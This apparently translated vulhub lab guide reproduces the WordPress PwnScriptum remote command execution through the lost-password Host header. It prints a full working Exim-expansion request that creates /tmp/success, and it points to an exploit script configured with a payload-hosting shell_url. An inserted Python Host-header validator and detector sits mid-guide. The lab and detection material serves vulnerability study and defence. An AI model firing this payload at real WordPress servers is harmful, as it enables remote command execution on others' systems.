Vulnerability details
For the full details, be sure to read: https://github.com/vulhub/vulhub/blob/master/wordpress/pwnscriptum/README.zh-cn.md
Reproducing the vulnerability
Send the following request; afterwards you can see that /tmp/success has been created successfully:
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
For the details of the payload, be sure to read the article linked above!
Exploiting this by hand is fairly cumbersome, so the author has thoughtfully written a script for us to use!
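The request above works because the attacker-controlled Host header ends up in SERVER_NAME, which WordPress uses to build the From address it hands to PHPMailer and, through it, to Exim. As an added defensive example (not code from the original article or the vulhub project), the following check validates a Host header as an RFC 1123 hostname, compares it against an allowlist of hostnames the site actually serves, and flags the Exim expansion markers used above; the sample requests and hostnames are constructed, and the payload fragment in the last sample is a placeholder.

```python
import re
from typing import Optional

# RFC 1123 hostname, optionally followed by :port. Spaces, parentheses and
# "${...}" (everything the request above relies on) fail this pattern.
HOST_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?::\d{1,5})?$"
)

# Fragments of an Exim string expansion smuggled into the Host header.
EXIM_MARKERS = ("${run{", "${substr{", "$tod_log", "$spool_directory")


def host_header(raw_request: str) -> Optional[str]:
    """Return the Host header value of a raw HTTP request, or None if absent."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    for line in head.split("\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            return value.strip()
    return None


def classify_host(value: Optional[str], allowed: set) -> str:
    """Classify a Host value: ok / unknown-host / malformed / exim-expansion / missing."""
    if value is None:
        return "missing"
    if any(marker in value for marker in EXIM_MARKERS):
        return "exim-expansion"               # the pattern used in the request above
    if len(value) > 253 or not HOST_RE.match(value):
        return "malformed"
    if value.split(":")[0].lower() not in allowed:
        return "unknown-host"                 # would reach SERVER_NAME unchecked
    return "ok"


# Constructed sample requests (hypothetical hosts; the payload is a placeholder).
ALLOWED_HOSTS = {"blog.example.com"}
SAMPLES = {
    "clean": "POST /wp-login.php?action=lostpassword HTTP/1.1\r\nHost: blog.example.com\r\n\r\n",
    "port": "POST /wp-login.php HTTP/1.1\r\nHost: blog.example.com:8080\r\n\r\n",
    "foreign": "POST /wp-login.php HTTP/1.1\r\nHost: other.example.net\r\n\r\n",
    "spaces": "POST /wp-login.php HTTP/1.1\r\nHost: blog.example.com (x)\r\n\r\n",
    "exim": "POST /wp-login.php HTTP/1.1\r\nHost: blog.example.com(any ${run{placeholder}} null)\r\n\r\n",
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(f"{label:8s} -> {classify_host(host_header(req), ALLOWED_HOSTS)}")
```

The same classify_host check can be run over the Host field your web server logs, so that "malformed" and "exim-expansion" hits become a detection signal rather than only a request-time rejection.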
In the script, change target to your target, user to a user that already exists, and shell_url to the URL where you host your payload.
If exploitation fails, take another look at the pitfalls described in the linked article!